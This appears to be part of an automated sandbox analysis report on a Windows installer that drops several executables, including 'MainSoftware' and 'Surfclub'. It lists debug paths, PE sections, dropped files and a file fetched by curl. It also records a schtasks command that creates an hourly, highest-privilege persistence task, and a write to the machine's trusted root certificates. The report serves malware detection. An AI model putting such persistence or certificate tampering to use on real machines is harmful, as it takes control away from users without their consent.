    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000013.00000002.2488625597.0000020F371C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488546167.0000020F37179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000013.00000002.2488665246.0000020F37216000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2488782180.0000020F372E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F37755000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2555282561.000001A507DF5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000013.00000002.2489453415.0000020F37561000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489389183.0000020F3754A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2554946567.000001A507DB1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000013.00000002.2489367223.0000020F37531000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489300922.0000020F37515000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000013.00000002.2487020549.0000020F351A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487094284.0000020F351D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2540077777.0000016470123000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000013.00000002.2487133129.0000020F35202000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: setup.exe, 00000000.00000003.1748683968.0000000009A2F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376DA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489851537.0000020F376F1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000013.00000002.2487586989.0000020F353C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487462974.0000020F35318000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: setup.exe, 00000000.00000003.1996568847.000000000BD1E000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000013.00000002.2517588700.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000013.00000000.2458595284.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000018.00000000.2467569570.00007FF73624D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000013.00000002.2489210974.0000020F374E1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489144792.0000020F374C9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000013.00000002.2502593462.0000020F3A561000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2502506832.0000020F3A521000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000013.00000002.2489892751.0000020F37714000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2489956997.0000020F37721000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000013.00000002.2487586989.0000020F353C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487462974.0000020F35318000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000013.00000002.2485338304.000001CE9F783000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2485407545.000001CE9F791000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000013.00000002.2490110262.0000020F37759000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: setup.exe, 00000000.00000003.1748683968.00000000098C0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000013.00000002.2489754059.0000020F376D2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: setup.exe, 00000000.00000003.1748683968.00000000098C0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000013.00000002.2503289063.0000020F3A631000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503182962.0000020F3A611000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000018.00000002.2575095760.000001A50ACF1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000013.00000002.2488855338.0000020F373A3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2503137120.0000020F3A601000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000013.00000002.2487646877.0000020F3547B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000013.00000002.2487805041.0000020F354A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
    Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
    Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
    Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
    Source: setup.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

    Data Obfuscation

    barindex
    .NET source code contains potential unpacker
    Source: 35.2.Surfclub.exe.2b03bf49000.43.raw.unpack, ReflectionMemberAccessor.cs.Net Code: CreateParameterlessConstructor
    Source: shiFAE8.tmp.0.drStatic PE information: 0xC7FEC470 [Wed Apr 29 05:06:56 2076 UTC]
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_0048CF30 SHGetFolderPathW,GetSystemDirectoryW,GetWindowsDirectoryW,GetWindowsDirectoryW,GetModuleFileNameW,SHGetSpecialFolderLocation,LoadLibraryW,GetProcAddress,GetEnvironmentVariableW,SHGetPathFromIDListW,SHGetMalloc,0_2_0048CF30
    Source: setup.exeStatic PE information: section name: .didat
    Source: setup.exeStatic PE information: section name: .fptable
    Source: MainSoftware.exe.0.drStatic PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.0.drStatic PE information: section name: .didat
    Source: MainSoftware.exe.0.drStatic PE information: section name: Section
    Source: MainSoftware.exe.0.drStatic PE information: section name: _RDATA
    Source: SoftwareDistributor.exe.0.drStatic PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.0.drStatic PE information: section name: .didat
    Source: SoftwareDistributor.exe.0.drStatic PE information: section name: Section
    Source: SoftwareDistributor.exe.0.drStatic PE information: section name: _RDATA
    Source: ShortcutFlags.dll.0.drStatic PE information: section name: .fptable
    Source: MSIFD70.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFDA0.tmp.0.drStatic PE information: section name: .fptable
    Source: shiFAE8.tmp.0.drStatic PE information: section name: .wpp_sf
    Source: shiFAE8.tmp.0.drStatic PE information: section name: .didat
    Source: MSIFB66.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFC13.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFC71.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFCA1.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFCD1.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFD11.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFD41.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFEF9.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFF39.tmp.0.drStatic PE information: section name: .fptable
    Source: MSIFF68.tmp.0.drStatic PE information: section name: .fptable
    Source: SoftwareDistributor.exe.1.drStatic PE information: section name: .CLR_UEF
    Source: SoftwareDistributor.exe.1.drStatic PE information: section name: .didat
    Source: SoftwareDistributor.exe.1.drStatic PE information: section name: Section
    Source: SoftwareDistributor.exe.1.drStatic PE information: section name: _RDATA
    Source: MainSoftware.exe.1.drStatic PE information: section name: .CLR_UEF
    Source: MainSoftware.exe.1.drStatic PE information: section name: .didat
    Source: MainSoftware.exe.1.drStatic PE information: section name: Section
    Source: MainSoftware.exe.1.drStatic PE information: section name: _RDATA
    Source: MSI437D.tmp.1.drStatic PE information: section name: .didat
    Source: MSI437D.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI5FC1.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI6001.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI608E.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI6C09.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI4251.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI42FE.tmp.1.drStatic PE information: section name: .fptable
    Source: MSI433D.tmp.1.drStatic PE information: section name: .fptable
    Source: shi3FF0.tmp.6.drStatic PE information: section name: .wpp_sf
    Source: shi3FF0.tmp.6.drStatic PE information: section name: .didat
    Source: Install.exe.part.10.drStatic PE information: section name: .CLR_UEF
    Source: Install.exe.part.10.drStatic PE information: section name: .didat
    Source: Install.exe.part.10.drStatic PE information: section name: Section
    Source: Install.exe.part.10.drStatic PE information: section name: _RDATA
    Source: Install.exe.24.drStatic PE information: section name: .managed
    Source: Install.exe.24.drStatic PE information: section name: hydrated
    Source: 262810.ocx.33.drStatic PE information: section name: .fptable
    Source: Surfclub.exe.34.drStatic PE information: section name: .CLR_UEF
    Source: Surfclub.exe.34.drStatic PE information: section name: .didat
    Source: Surfclub.exe.34.drStatic PE information: section name: Section
    Source: Surfclub.exe.34.drStatic PE information: section name: _RDATA
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_05498472 push eax; ret 0_3_05498881
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_05498472 push eax; ret 0_3_05498881
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0549FC2C pushad ; iretd 0_3_0549FC2D
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0549FC2C pushad ; iretd 0_3_0549FC2D
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0549E53B push ebx; iretd 0_3_0549E899
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0549E53B push ebx; iretd 0_3_0549E899
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_08390A3C push esi; iretd 0_3_08390A43
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_05498472 push eax; ret 0_3_05498881
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_05498472 push eax; ret 0_3_05498881
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0549FC2C pushad ; iretd 0_3_0549FC2D
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0549FC2C pushad ; iretd 0_3_0549FC2D
    Source: C:\Users\user\Desktop\setup.exeCode function: 0_3_0549E53B push ebx; iretd 0_3_0549E899
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\lzmaextractor.dllJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe (copy)Jump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFC13.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFCA1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6C09.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFD11.tmpJump to dropped file
    Source: C:\Program Files (x86)\Main\MainSoftware.exeFile created: C:\Program Files (x86)\Main\Chop\Install.exeJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFC71.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\ProgramFilesFolder\Main\MainSoftware.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5FC1.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFCD1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI433D.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI608E.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\SoftwareDistributor.exeJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI437D.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFDA0.tmpJump to dropped file
    Source: C:\Windows\System32\curl.exeFile created: C:\Users\user\AppData\Local\Temp\262810.ocxJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\shi3FF0.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\shiFAE8.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFEF9.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Main\MainSoftware.exeJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFF68.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6001.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFD41.tmpJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe.partJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI42FE.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\ShortcutFlags.dllJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFF39.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFB66.tmpJump to dropped file
    Source: C:\Program Files\Surfclub\Install.exeFile created: C:\Program Files\Surfclub\Surfclub.exeJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Local\Temp\MSIFD70.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4251.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI437D.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6001.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI6C09.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI42FE.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI5FC1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI433D.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI608E.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4251.tmpJump to dropped file
    Source: C:\Windows\SysWOW64\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\Install.exe.partJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Users\user\Desktop\setup.exeFile created: C:\Users\user\AppData\Roaming\Atomix\Atomix 1.0.0\install\69B1923\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\Addons\Surfclub\How to uninstall.txtJump to behavior
    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\Atomix\How to uninstall.txtJump to behavior

    Boot Survival

    barindex
    Uses schtasks.exe or at.exe to add and modify task schedules
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess created: C:\Windows\System32\schtasks.exe "schtasks.exe" /create /sc hourly /tn "MyPersistentApp_Hourly" /tr "\"C:\Program Files (x86)\Main\MainSoftware.exe\" Loop" /ru "user-PC\user" /RL HIGHEST /f
    Source: C:\Users\user\Desktop\setup.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A BlobJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
    Source: C:\Users\user\Desktop\setup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Program Files (x86)\Main\MainSoftware.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\schtasks.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: 1CE9DE90000 memory reserve | memory write watchJump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeMemory allocated: 1646E7D0000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeMemory allocated: 222142F0000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\Chop\Install.exeMemory allocated: 1BF6FC60000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Install.exeMemory allocated: 23D4C830000 memory reserve | memory write watch
    Source: C:\Program Files\Surfclub\Surfclub.exeMemory allocated: 26FA2560000 memory reserve | memory write watch
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Program Files (x86)\Main\MainSoftware.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Atomix\Addons\SoftwareDistributor.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Install.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files\Surfclub\Surfclub.exeThread delayed: delay time: 922337203685477
    Source: C:\Program Files (x86)\Main\MainSoftware.exeWindow / User API: threadDelayed 4918
    Source: C:\Program Files (x86)\Main\MainSoftware.exeWindow / User API: threadDelayed 526
    Source: C:\Program Files\Surfclub\Install.exeWindow / User API: threadDelayed 685
    Source: C:\Program Files\Surfclub\Surfclub.exeWindow / User API: threadDelayed 451
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\AI_EXTUI_BIN_6264\lzmaextractor.dllJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFCA1.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFC13.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6C09.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFD11.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFC71.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI5FC1.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFCD1.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI433D.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI608E.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI437D.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFDA0.tmpJump to dropped file
    Source: C:\Windows\System32\curl.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\262810.ocxJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi3FF0.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFEF9.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shiFAE8.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFF68.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI6001.tmpJump to dropped file
    Source: C:\Users\user\Desktop\setup.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIFD41.tmpJump to dropped file
    Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI42FE.tmpJump to dropped file
